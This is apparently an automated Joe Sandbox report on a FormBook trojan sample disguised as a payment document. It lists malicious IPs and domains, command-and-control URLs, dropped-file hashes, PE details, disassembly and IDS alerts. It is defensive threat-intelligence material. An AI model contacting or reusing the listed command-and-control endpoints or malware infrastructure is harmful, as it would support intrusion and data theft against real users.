http://nsis.sf.net/NSIS_ErrorError | TT COPY_02101011.exe | false | | high

                                              Contacted IPs


                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
37.123.118.150 | www.blttsperma.quest | United Kingdom | 13213 | UK2NET-ASGB | true
213.186.33.5 | www.le-hameau-enchanteur.com | France | 16276 | OVHFR | true
185.65.236.168 | helpfromjames.com | United Kingdom | 33968 | INTERNETENGINEERINGASGB | true
198.54.125.56 | webartsolution.net | United States | 22612 | NAMECHEAP-NETUS | true
151.139.128.11 | w2y6q8s9.stackpathcdn.com | United States | 20446 | HIGHWINDS3US | true
143.95.80.65 | intelldat.com | United States | 62729 | ASMALLORANGE1US | true
3.96.23.237 | www.yesrecompensas.lat | United States | 16509 | AMAZON-02US | true
172.67.158.42 | www.gadget198.xyz | United States | 13335 | CLOUDFLARENETUS | true

                                              General Information

                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                              Analysis ID:528714
                                              Start date:25.11.2021
                                              Start time:17:47:24
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 10m 26s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:TT COPY_02101011.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:22
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@8/2@13/8
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 24.9% (good quality ratio 22.6%)
                                              • Quality average: 75.3%
                                              • Quality standard deviation: 31%
                                              HCA Information:
                                              • Successful, ratio: 89%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                              • Excluded IPs from analysis (whitelisted): 92.122.145.220
                                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed, report is missing behavior information

                                              Simulations

                                              Behavior and APIs

                                              No simulations

                                              Joe Sandbox View / Context

                                              IPs

Match | Associated Sample Name / URL | Detection | Context
37.123.118.150 | XKLyPH8fil.exe | malicious | www.piperskara.quest/bcwg/?n2Jxc2=LQgramtgvz9gpRCm69Bgg9zYzNqDoKXe/xoOYyM20y9Hdwqa+bZJQ26d8/uTsQZaK3jtWYMCag==&y2JxkH=7nx4wVHx1hZHPtlP
37.123.118.150 | Citation-HEQ211025001T-EXPP v4,pdf.exe | malicious | www.badkyker.quest/b62n/?0N645BeP=eFIp1pQq3ETUGTceTruOFOJ1dQmPu2LEZmadZ4szDyfrUCBwXGEH/Drl48Om3GOk+gVG&vVSdF=CPGHuRZ
37.123.118.150 | VSL_MV SEA-BLUE SHIP OWNERS.exe | malicious | www.blttsperma.quest/e8ia/?m0D8S=cRcPqDD8gRHP&3f0LiN=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS
37.123.118.150 | Order.exe | malicious | www.sytypij.xyz/jy0b/?gR-P5L=JDHDbHM0&j2Jp=eYa2jAjhrU72L3WVpxH9jsjNT0srQ2ahDVTWcuHziu1GnXFZstAE4JmEMDfUnYWcFCv5
37.123.118.150 | New Offer.exe | malicious | www.oporbagehi.quest/ecus/?d6AdKh=KpN4wErd7wd6llqzpYzMQWPswpobIZ1kAW5Qs8tqKzxMxpJ7Q8ocWbT+8LJmfPS2zarQ&IfRL=5jZ4UJDHJvFlB8
37.123.118.150 | 202111161629639000582.exe | malicious | www.atinokvanta.quest/wkgp/?2dX=P6APITtHDX2tmpK&4h5=npCMCl+RregmTw6cx8+byq65zg7h1u/lJ5mbqhiD7E8vI14+TRkcHQFH1Zs3yeqswACN
37.123.118.150 | vGULtWc6Jh.exe | malicious | www.krallechols.quest/scb0/?NBZ4cP=XHAF2WnuIR8IW6HytrV3Cr1d9KXYf9+Xd4qi9e8E1EN5vKa6DU4i1iuF59U9gzfK/Tw0tTlNxw==&q6h=5jxdANKPGHO8HP5p
37.123.118.150 | 7OjVU04f8q.exe | malicious | www.heglemrca.quest/gtc5/?8ph=lCkVMu55gkgFdbVVVGZph8qEoSdcluTQL+LKOCcEpF7+otlKd5QeJhNynVws+cZ9KW9V&U0GDa=fB_X46C
37.123.118.150 | rfq.exe | malicious | www.hrtogjort.quest/s2qi/?MhBd9XLx=HbGGlsNKynhRn1OZSUDTcU11jE9KquvSJxsaBbHywHdHvBVsuicee/3hTkOTqTMLFva3&C48h=pVtdTPKHwt9dZ63P
37.123.118.150 | DHL50458006SHP.exe | malicious | www.hoedetamni.quest/gab8/?r6VTf8yP=Zf6VUcDVhu0aqEZvSUrwMEMdRMHbm2PdB59ahhn3b7f2yp7kqyIqWmK4U818rxqelde0&gPtX=0b0L5phHSpgxbZl0
37.123.118.150 | DuxgwH47QB.exe | malicious | www.tuuttidisney.quest/cfn8/?wZEhNtn=GNR/cswsNXaTiqGvaiOTwsMtTfgjjwHaPXMbbiwu1L+Zpp8z0hBER1I6yfXZZZrQ1pKU&7ntP2=G2JlCZwhJ8t
37.123.118.150 | SWIFT-MLSB-11,546__doc.exe | malicious | www.mtliglhare.quest/ubw4/?VZYl2Vp=qL1mP/x0XSkEHwyuRhVdYoin7gtKozj3LYPYdVwNJXx54g06P5J7f6F5vLOjeL9T1oXj&G4=1bnHHhbxClV
37.123.118.150 | PRODUCT LIST.exe | malicious | www.aprilsaak.quest/r4gk/?6l=3fjP&1bm0IRS8=dD2+aeCUO1pkqpyruayuoeI20NWaZ6jY1kQ6if7hU6jXgmj08xN16ajd8indwcDO0NbIixWhaw==
37.123.118.150 | SWIFT DOCUMENT COPY.exe | malicious | www.corajevedrai.quest/upwd/?x8=hpO3CcePYc3prcoIGVA6owp1UQBNNFXR4gqjueTrWIrEzkWp/yee+5MWCTf63rWqID1C&xtHlu=0puh52O0_h
37.123.118.150 | Payment Order.exe | malicious | www.stabisville.quest/nurc/?n0Gpir=xERCAQBI2m4XRT5CLsnYgM+az/rVRLQ1H441UzEPFH2QLlvjvR24zCN7skS1qjoDAA+XcrVssg==&TvZl=6lHLirfHDXX034Pp
37.123.118.150 | SOA & INV FOR OCT'21.exe | malicious | www.ctenemuhos.quest/u0n0/?EZl=KZxX4F_xJ&e64=fcUCpViyTx4uxXwUqP+G8p0RJhbnp/Z5ub+Zi25WexS7pBXOke7f54ZjxydeLif1AgF3
37.123.118.150 | Purchase Contract.xlsx | malicious | www.tyralruutan.quest/ht08/?bxl0i=0LfY3BA00YnG8e5qQo14XrLHsratMBYj67fE9qBxS9FBqgxOIw3Kg+qKVmnM3o0/QqiBVg==&vv-hIb=4hgpGxNXe
37.123.118.150 | Quotation No. 1687R.exe | malicious | www.sundaytejero.quest/snec/?V4tH=KdT+8tt7OUCbDfTw0fk36Q5Xf/UpdKxEg1K3hHLxh6D05f55cX0U/jLAC3JjknW7yeD82nGrpw==&hD=-Zl0iNBHyhVpI
37.123.118.150 | HCCuazHtYM.exe | malicious | www.sittedarren.quest/sywu/?Wdcl=fHRuPhyQjgmYV5E+eKHhA+2gSo4Cg/nheMJ8Ybl6zEGQxH+hZl6uDzrGB7nkpCNUypvn&f0=6lux
37.123.118.150 | Enquiry Reference Number 0025559278.exe | malicious | www.kermmehienon.quest/u0n0/?2d0Xs=E6PhrdPh&j0DxqnKx=TP634yAaw8AegrTYjeROOFA+5EuX4ENZ2Qm/rilUcShsZcOxcZkZp/kd1VI3lEZa/kSo

                                              Domains

Match | Associated Sample Name / URL | Detection | Context
www.blttsperma.quest | VSL_MV SEA-BLUE SHIP OWNERS.exe | malicious | 37.123.118.150
www.blttsperma.quest | Original Shipment Doc Ref 2853801324189923,PDF.exe | malicious | 37.123.118.150
www.bestinvest-4-you.com | POSGORSGL2110210416.exe | malicious | 104.21.31.204
wss.easycompanies.com.au | VSL_MV SEA-BLUE SHIP OWNERS.exe | malicious | 13.210.99.21
wss.easycompanies.com.au | NEW ORDER 3742.exe | malicious | 13.55.94.210
wss.easycompanies.com.au | Swift001.exe | malicious | 13.55.94.210

                                              ASN

Match | Associated Sample Name / URL | Detection | Context
UK2NET-ASGB | XKLyPH8fil.exe | malicious | 37.123.118.150
UK2NET-ASGB | Citation-HEQ211025001T-EXPP v4,pdf.exe | malicious | 37.123.118.150
UK2NET-ASGB | VSL_MV SEA-BLUE SHIP OWNERS.exe | malicious | 37.123.118.150
UK2NET-ASGB | Order.exe | malicious | 37.123.118.150
UK2NET-ASGB | New Offer.exe | malicious | 37.123.118.150
UK2NET-ASGB | 202111161629639000582.exe | malicious | 37.123.118.150
UK2NET-ASGB | vGULtWc6Jh.exe | malicious | 37.123.118.150
UK2NET-ASGB | 2YnVgiNH23 | malicious | 83.170.125.27
UK2NET-ASGB | 7OjVU04f8q.exe | malicious | 37.123.118.150
UK2NET-ASGB | rfq.exe | malicious | 37.123.118.150
UK2NET-ASGB | DHL50458006SHP.exe | malicious | 37.123.118.150
UK2NET-ASGB | DuxgwH47QB.exe | malicious | 37.123.118.150
UK2NET-ASGB | SWIFT-MLSB-11,546__doc.exe | malicious | 37.123.118.150
UK2NET-ASGB | PRODUCT LIST.exe | malicious | 37.123.118.150
UK2NET-ASGB | SWIFT DOCUMENT COPY.exe | malicious | 37.123.118.150
UK2NET-ASGB | Payment Order.exe | malicious | 37.123.118.150
UK2NET-ASGB | SOA & INV FOR OCT'21.exe | malicious | 37.123.118.150
UK2NET-ASGB | Purchase Contract.xlsx | malicious | 37.123.118.150
UK2NET-ASGB | Quotation No. 1687R.exe | malicious | 37.123.118.150
UK2NET-ASGB | HCCuazHtYM.exe | malicious | 37.123.118.150

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\5itxry81kuzl8up3
                                              Process:C:\Users\user\Desktop\TT COPY_02101011.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):219451
                                              Entropy (8bit):7.993798564303036
                                              Encrypted:true
                                              SSDEEP:6144:XXWWWWWWWWWWWWWW9+HY+ryMDZ5cejsybkgbx+1Tzh+VWwCfQ5R:nWWWWWWWWWWWWWW9+DykZmeAk/9sNoWA
                                              MD5:7CFBCCD72474438D7FC638703213241C
                                              SHA1:45DA096B227587739BE2CFD1FD216A7A0FC40A9A
                                              SHA-256:02E9F10A4673CF06DC6DED72098E6D37E6162B5C88937EB67EBBFC0C0EE39D58
                                              SHA-512:66B38FD3C6A4A9C85338E13776204A65A4BE9323357C7758472946F2CC21ECE513D4DF4790CF232D109083365360046BE38732725F09B56D5FC0BF4B0CC0629B
                                              Malicious:false
                                              Reputation:low
                                              Preview: 0..c.K./|y.Su3U...O.......r)........b..,qLP..P4..K#8%.....(g.+...C.\......kL.V.../.4......p.{........<.J~....(..T.......[..LP..?."7.W.f.'...$...E.R...2]{[.i..A.6....$...#.iC.OU.Rq..n......~..c4.......N....1e..S..[..z..k.... j.Q.@..FR.'.a...w..0..r..I.K./|>.9. ...^YO.'......... ..Q..,qLP..P4..K#8%.....(>.+|.....SY..4.x._Gq....it. .>.:...p...s.P.ff4..U...7.N......[..w..:.h.v......N.bl.H..(FH>.0/$m....x..f...?.E.9...@OU.^@...`....F...c4........a...v.J.S..[..z..U... j..@.@.HFR...'.a._...0....I.K./|k.9....^YO.'.g.............b..,qLP..P4..K#8%.....(>.+|.....SY..4.x._Gq....it. .>.:...p...s.P.ff4..U...7.N......[..w..:.h.v......N.bl.H..(FH>.0/$m....x..f...?.E.#.iC.OU......^...N1...c4........a...1.J.S..[..z..U... j..@.@.HFR...'.a._...0....I.K./|k.9....^YO.'.g.............b..,qLP..P4..K#8%.....(>.+|.....SY..4.x._Gq....it. .>.:...p...s.P.ff4..U...7.N......[..w..:.h.v......N.bl.H..(FH>.0/$m....x..f...?.E.#.iC.OU......^...N1...c4........a...1.J.S..[..z..U... j
                                              C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll
                                              Process:C:\Users\user\Desktop\TT COPY_02101011.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):119296
                                              Entropy (8bit):6.288224575764392
                                              Encrypted:false
                                              SSDEEP:1536:oEQbLaInqrSaynnz92zu5Q8cnsu0azuIC9ry1VAqKjMoZfSVgHJsWjcdOeJ:mnOSFpl4u9jqwQV02OeJ
                                              MD5:54C860C5CD0476D353802753C7BBFB06
                                              SHA1:F3FAC4C8E96CBB528944FE76C7F74FDA8171A597
                                              SHA-256:19FBFDB247A76A54351902926C309FD6D3E7BE25C6DCA0062FC781215680913E
                                              SHA-512:83DD85D9A54A1FA688C7776A15E48D70B8EC12ED789F4AC2054FA3AFFAED3FDAA375A5BD3D542C7B1831810A4825EE518A14F2390C50BFB65D9B774BCEB6B183
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 16%
                                              Reputation:low
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w....G..w...%a..w...%_..w...%`..w.......w.......w.......w...w...w...)...w...)...w...)...w...)...w..Rich.w..........PE..L.....a...........!.....j...d............................................... ......................................@...H...........................................P...............................p...@............................................text....h.......j.................. ..`.bss....D................................rdata...K.......L...n..............@..@.data...............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.93374011532904
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 92.16%
                                              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:TT COPY_02101011.exe
                                              File size:309491
                                              MD5:ebabc0d66a9e01cc0926f3b311feff5f
                                              SHA1:83a44664135a7255045becde754dae29be496c8f
                                              SHA256:ea8733d0ea6248e2f522487d09e7854230a648e67f1a5e90fea31f6305a1ff7b
                                              SHA512:b9f9c3ec7080bf31e0ab43b68f8183d75a59ae262e7320e846883f7ec91695e5e01d70432a163252712fc7bdb6e27b6e5fb6b5589e31eb8779f3b2b5586eeeeb
                                              SSDEEP:6144:rGidvqI+0kw8220eOw980S46r8T+1T5VM8vs+u/E4+jfQaVz6142k+QF:Zd+nzbOw9l6r8Ts5sysax6142xk
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....

                                              File Icon

                                              Icon Hash:b2a88c96b2ca6a72

                                              Static PE Info

                                              General

                                              Entrypoint:0x4030e3
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                              DLL Characteristics:
                                              Time Stamp:0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:7fa974366048f9c551ef45714595665e

                                              Entrypoint Preview

                                              Instruction
                                              sub esp, 00000180h
                                              push ebx
                                              push ebp
                                              push esi
                                              xor ebx, ebx
                                              push edi
                                              mov dword ptr [esp+18h], ebx
                                              mov dword ptr [esp+10h], 00409158h
                                              xor esi, esi
                                              mov byte ptr [esp+14h], 00000020h
                                              call dword ptr [00407030h]
                                              push 00008001h
                                              call dword ptr [004070B0h]
                                              push ebx
                                              call dword ptr [0040727Ch]
                                              push 00000008h
                                              mov dword ptr [0042EC18h], eax
                                              call 00007F80707D36A8h
                                              mov dword ptr [0042EB64h], eax
                                              push ebx
                                              lea eax, dword ptr [esp+34h]
                                              push 00000160h
                                              push eax
                                              push ebx
                                              push 00428F90h
                                              call dword ptr [00407158h]
                                              push 0040914Ch
                                              push 0042E360h
                                              call 00007F80707D335Fh
                                              call dword ptr [004070ACh]
                                              mov edi, 00434000h
                                              push eax
                                              push edi
                                              call 00007F80707D334Dh
                                              push ebx
                                              call dword ptr [0040710Ch]
                                              cmp byte ptr [00434000h], 00000022h
                                              mov dword ptr [0042EB60h], eax
                                              mov eax, edi
                                              jne 00007F80707D0B8Ch
                                              mov byte ptr [esp+14h], 00000022h
                                              mov eax, 00434001h
                                              push dword ptr [esp+14h]
                                              push eax
                                              call 00007F80707D2E40h
                                              push eax
                                              call dword ptr [0040721Ch]
                                              mov dword ptr [esp+1Ch], eax
                                              jmp 00007F80707D0BE5h
                                              cmp cl, 00000020h
                                              jne 00007F80707D0B88h
                                              inc eax
                                              cmp byte ptr [eax], 00000020h
                                              je 00007F80707D0B7Ch
                                              cmp byte ptr [eax], 00000022h
                                              mov byte ptr [eax+eax+00h], 00000000h

                                              Rich Headers

                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804

                                              Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74b0 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x900 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                              Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5b68 | 0x5c00 | False | 0.67722486413 | data | 6.48746502716 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x129c | 0x1400 | False | 0.4337890625 | data | 5.04904254867 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x25c58 | 0x400 | False | 0.58203125 | data | 4.76995537906 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x2f000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x37000 | 0x900 | 0xa00 | False | 0.4078125 | data | 3.93441125971 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x37190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x37478 | 0x100 | data | English | United States
RT_DIALOG | 0x37578 | 0x11c | data | English | United States
RT_DIALOG | 0x37698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x376f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x37710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                              Imports

DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                              Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

                                              Network Behavior

                                              Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/25/21-17:50:07.050486 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49820 | 37.123.118.150 | 192.168.2.4
11/25/21-17:50:17.640515 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49824 | 80 | 192.168.2.4 | 143.95.80.65
11/25/21-17:50:17.640515 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49824 | 80 | 192.168.2.4 | 143.95.80.65
11/25/21-17:50:17.640515 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49824 | 80 | 192.168.2.4 | 143.95.80.65
11/25/21-17:50:56.215134 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49850 | 80 | 192.168.2.4 | 104.21.31.204
11/25/21-17:50:56.215134 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49850 | 80 | 192.168.2.4 | 104.21.31.204
11/25/21-17:50:56.215134 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49850 | 80 | 192.168.2.4 | 104.21.31.204

                                              Network Port Distribution

                                              TCP Packets


                                              UDP Packets


                                              DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 25, 2021 17:49:30.427966118 CET | 192.168.2.4 | 8.8.8.8 | 0x6f8e | Standard query (0) | www.mcclureic.xyz | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:40.561280966 CET | 192.168.2.4 | 8.8.8.8 | 0xe637 | Standard query (0) | www.yesrecompensas.lat | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:45.893459082 CET | 192.168.2.4 | 8.8.8.8 | 0x968a | Standard query (0) | www.gadget198.xyz | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:50.999294996 CET | 192.168.2.4 | 8.8.8.8 | 0x550f | Standard query (0) | www.le-hameau-enchanteur.com | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:56.159490108 CET | 192.168.2.4 | 8.8.8.8 | 0x12e7 | Standard query (0) | www.henleygirlscricket.com | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:01.505476952 CET | 192.168.2.4 | 8.8.8.8 | 0x8c70 | Standard query (0) | www.webartsolution.net | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:06.924803972 CET | 192.168.2.4 | 8.8.8.8 | 0xe4c9 | Standard query (0) | www.blttsperma.quest | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:17.329592943 CET | 192.168.2.4 | 8.8.8.8 | 0x8757 | Standard query (0) | www.intelldat.com | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:22.799395084 CET | 192.168.2.4 | 8.8.8.8 | 0x8462 | Standard query (0) | www.helpfromjames.com | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:44.591826916 CET | 192.168.2.4 | 8.8.8.8 | 0xff5e | Standard query (0) | www.helpfromjames.com | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:48.923758030 CET | 192.168.2.4 | 8.8.8.8 | 0xa78c | Standard query (0) | www.dandftrading.com | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:56.143178940 CET | 192.168.2.4 | 8.8.8.8 | 0xb4d0 | Standard query (0) | www.bestinvest-4-you.com | A (IP address) | IN (0x0001)
Nov 25, 2021 17:51:01.299563885 CET | 192.168.2.4 | 8.8.8.8 | 0x51f4 | Standard query (0) | www.weprepareamerica-planet.com | A (IP address) | IN (0x0001)

                                              DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 25, 2021 17:49:30.530443907 CET | 8.8.8.8 | 192.168.2.4 | 0x6f8e | Server failure (2) | www.mcclureic.xyz | none | none | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:40.645955086 CET | 8.8.8.8 | 192.168.2.4 | 0xe637 | No error (0) | www.yesrecompensas.lat | | 3.96.23.237 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:45.931274891 CET | 8.8.8.8 | 192.168.2.4 | 0x968a | No error (0) | www.gadget198.xyz | | 172.67.158.42 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:45.931274891 CET | 8.8.8.8 | 192.168.2.4 | 0x968a | No error (0) | www.gadget198.xyz | | 104.21.8.250 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:51.086345911 CET | 8.8.8.8 | 192.168.2.4 | 0x550f | No error (0) | www.le-hameau-enchanteur.com | | 213.186.33.5 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:49:56.369827032 CET | 8.8.8.8 | 192.168.2.4 | 0x12e7 | No error (0) | www.henleygirlscricket.com | w2y6q8s9.stackpathcdn.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 17:49:56.369827032 CET | 8.8.8.8 | 192.168.2.4 | 0x12e7 | No error (0) | w2y6q8s9.stackpathcdn.com | | 151.139.128.11 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:01.580594063 CET | 8.8.8.8 | 192.168.2.4 | 0x8c70 | No error (0) | www.webartsolution.net | webartsolution.net | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 17:50:01.580594063 CET | 8.8.8.8 | 192.168.2.4 | 0x8c70 | No error (0) | webartsolution.net | | 198.54.125.56 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:06.989542961 CET | 8.8.8.8 | 192.168.2.4 | 0xe4c9 | No error (0) | www.blttsperma.quest | | 37.123.118.150 | A (IP address) | IN (0x0001)
